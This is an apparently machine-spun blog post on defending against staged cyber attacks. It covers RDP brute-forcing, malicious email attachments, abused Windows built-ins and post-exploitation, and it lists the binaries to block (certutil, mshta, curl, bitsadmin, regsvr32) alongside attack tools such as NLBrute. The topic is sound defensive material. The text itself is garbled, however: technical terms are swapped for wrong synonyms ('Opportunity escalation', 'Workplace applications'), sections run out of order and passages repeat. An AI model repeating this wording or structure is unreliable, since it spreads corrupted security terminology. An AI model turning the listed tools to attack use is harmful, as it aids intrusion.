SOC First Defense Phase – Understanding The Cyber Attack Chain – A Defense Approach with/without SOC

These actions can be followed by any Network Security Teams or small scale industries or smaller firms who can not manage SOC, will assist to create a defense wall with this.

Breaking the attack chain and averting the criminals mean to stop their goal, will lower the business impact from the data being lost. This will not provide you with 100% defense steps or blue-team guides to your organization.

Itll supply a piece of brief details over the attack vectors and every SOC team need to produce a defense system for it to have a preliminary stage of security tracking.

This post will help you to comprehend the modern cyber hazards and the most typically utilized attack surfaces behind any malware/cyber-attacks. In a lot of times, the cyber attacks are getting executed in stages. The SOC group must understand the attack patterns and the attack chain.

Likewise, you can discover Complete SOC Analyst– Cyber Attack Intrusion Training.

3 Major facts you require to bear in mind.

Cybercriminals always prepare ahead of security controls.

1.) Do not provide whatever easily to the aggressor, make it harder for him to get. (Control Measures in the network) 2.) Dont allow legitimate vulnerable application if not in use, assaulters constantly use legitimate applications in the network. (Abuse of LOLBins) 3.) Dont think that aggressors create a just a single piece of code, they always count on attack stages with more functionalities and commands. (Cyber Kill Chains).

The modern-day cyber attacks arent a single stage, they provide malware to any companies in stages of infections. The opponent tempts the victim to click any non-malicious urls and it reroutes to CnC and drops the payloads. These phases can not be obstructed by standard defense systems.

RDP– Remote Desktop Protocol (Port 3389) Identifying servers with vulnerable RDP connections (port 3389 is default) has actually been made extremely simple thanks to scanning tools like Shodan and masscan.

From there, its simply a matter of using brute-forcing tools like NLBrute to split the RDP account credentials, and assaulters remain in. Additionally, if assaulters are feeling especially lazy they can just head over to the underground DarkMarket xDedic, where RDP access to a compromised server can cost as little as $6.

Fig: This is not Cyber Kill Chain. Its a standard stage of attack.

Block unauthorized and undesirable e-mail accessory extensions.Gmail blocked these extensions and it can be obstructed in your organizations too.

If malware provided effective, how you going to defend its lateral movement and determination? If the attacker achieved all his activities, his final phase will be exfiltrated or breach– Leaving your organization Network.

The defense mechanisms you have actually to build based upon your environment.

In current variations, the emails are the feasible alternatives for cyber assailants to draw the victim to click any malicious links by appealing words or images. In some scenarios, the e-mail is the 1st phase to entice the victim to run any scripts from the e-mail, which will abuse the users applications and download any payloads for the 2nd phase of infection. Disabling or restricting those legitimate resources from downloading files from the Internet can help prevent payload retrieval.

Major Two methods: 1.) Email Delivery– MalSpam, Spear phishing, Email Campaigns 2.) RDP Entry Points.

Lets break down the stages and see the defense reaction of it to make sure security from typical infection vectors.

Defense Reaction of RDP Abuse: – Restrict gain access to via firewalls – Use strong passwords and 2FA/MFA – Limit users who can log in utilizing RDP – Set an account lockout policy to experience strength attacks.

Cyber Attackers constantly love to abuse legitimate Microsoft office applications to achieve their objectives. Because1.) Workplace applications are widely accepted. A lot of accessory names used by enemies in an e-mail (Invoice, Spreadsheet, Reports, Balance Sheets, Documents, Tenders) 2.) Office apps are simple to weaponize. Microsoft in-built capabilities are drawn in by assaulters and they utilize in more methods.

Stage 1A: Retrieval of payloads from Command & & Control servers.

Phase 1: Delivery of Malware/MalSpam.

In every e-mail, firewalls/ips and organization entrances play an important role in preventing the malware shipment to your organization. However in recent times, these strategies are easily getting defeated by Cyber enemies.

A.) Common used Email attachments in most email projects.1.

B.) Restrict the workers to run the scripts at the endpoint level.C.) User Awareness on spam emails and sufficient training.

RDP has become a favorite infection vector for ransomware criminals, in particular, with the actors behind SamSam, CrySiS, LockCrypt, Shade, Apocalypse, and other versions all getting in on the act.

How aggressors abuse Microsoft applications to recover payloads?

There are a variety of harmful injection methods attackers can utilize; DLL Injection, Reflective DLL Injection, Process Hollowing, Process doppelgänging, AtomBombing, etc.

Legitimate Applications The Following Can Be Used To Circumvent Application Whitelisting: Either Blocking or Under Monitoring is recommended.

A.) VBScript and JavaScript– Disabling it if not neededB.) Powershell– Disabling or reducing the capabilities by utilizing Applocker or Windows Software Restriction Policy (SRP). C.) Abusing certutil.exe, mshta.exe, curl.exe, bitsadmin.exe and regsvr32.exe– Blocking the application and block from making outgoing requests.

Not just Microsoft Office applications, opponents also utilize the legitimate applications and windows built-in tools to recover payloads.

Stage 2: Ensure the malware is not getting carried out and topped the company.

Defense versus the malware execution in your environment are,.

Attacks have evolved to bypass/evade AV. To be reliable, endpoint security software ought to make use of machine learning for smarter file analysis and real-time system activity analysis developed for discovering and blocking harmful habits.

Fig: Reference.

Traditionally, organizations have actually depended on anti-virus (AV) software application to avoid malware from running.

Exploiting Equation Editor– CVE-2017-11882– Functionality eliminated in January 2018 Windows Security Update.

Application whitelisting is another good layer but can be challenging to keep. Attackers can also bypass whitelisting and AV by injecting destructive code into authorized processes.

Attackers can likewise bypass whitelisting and lots of AV/NGAV options by injecting destructive code into the memory space of a legitimate procedure, thus hijacking its opportunities and carrying out under its guise.

1.) Endpoint defense.2.) Application whitelisting 3.) Disable or restrict users from running scripts4.) if possible Windows Control over Folders5.) To avoid injection methods, monitoring procedures and API calls.

Stage 3: Ensure your data arent exfiltrated or breached at/after the last of the attack chain.

Once enemies have preliminary access, their attention turns to post-exploitation activities To continue running under the radar, attackers prefer “living off the land,” using genuine tools and procedures currently present on the system. Among the first objectives of post-exploitation is usually advantage escalation, the procedure of gaining extra rights and gain access to To accomplish persistence.

The technique of abusing legitimate programs and built-in functionality in order to perform destructive activities without raising warnings. Some ofthe most commonly abused tools are PowerShell, Windows Management Instrumentation (WMI), and remote administration tools like PsExec.

Opponent Techniques and Defense Mechanisms:.

A growing number of malware variants are created to propagate automatically, typically by abusing remote administration tools.

Attackers can abuse system tools and performance to produce various load points, consisting of saving scripts in the computer system registry.

1.) Abusing programs created to auto-elevatea.) Usage greatest UAC enforcement level whenever possible.b.) Allow Admin Approval Mode.c.) Eliminate users from local admin group.2.) DLL hijackinga.) Endpoint security software.b.) Disallow loading of remote DLLs.c.) Enable Safe DLL Search Mode.

3.) Opportunity escalation exploits (token stealing, exploiting NULL guideline dereference vulnerabilities, setting security descriptors to NULL, etc) a.) Endpoint security software application with user space, kernel area, and CPU-level exposure.4.) Dumping credentialsa.) Disable credential caching.b.) Disable or restrict PowerShell with AppLocker.c.) Practice the least advantage, avoid credential overlap.d.) Endpoint protection software that protects LSASS and other credential stores5.) Lateral motion strategies (abusing remote administration tools, etc) a.) UAC settings recommendations.b.) Network division finest practices (ref: SANS) c.) Two-factor authentication (2FA).6.) Concealing malicious scripts in the registrya.) Display with Autoruns.7.) Producing harmful set up tasksa.) Display for Windows Security Log Event ID 4698.8.) Abusing WMI to set off script execution based upon occasions (at start-up, and so on) a.) Create protective WMI occasion subscriptions.a.) When possible, set a repaired port for remote WMI and block it.

You can follow us on Linkedin, Twitter, Facebook for everyday Cybersecurity updates.


Dont think that aggressors produce an only a single piece of code, they always rely on attack stages with more performances and commands. The modern-day cyber attacks arent a single stage, they deliver malware to any companies in phases of infections.

This is all about the fundamental understanding of what type of risk vectors and attack surfaces we may experience in our organization and build a defense wall at fundamental level.

This will not supply you 100% safe against all threats, there are more variety of special methods emerging and more correlation of the malware patterns in develop. We should ensure that we are already safe against the understand pattern of cyber attacks based upon above suggestions.

Remember, “When protectors find out, transgressors evolve”.

This article will help you to comprehend the contemporary cyber dangers and the most typically used attack surfaces behind any malware/cyber-attacks. In the majority of times, the cyber attacks are getting carried out in stages. The SOC group should comprehend the attack patterns and the attack chain.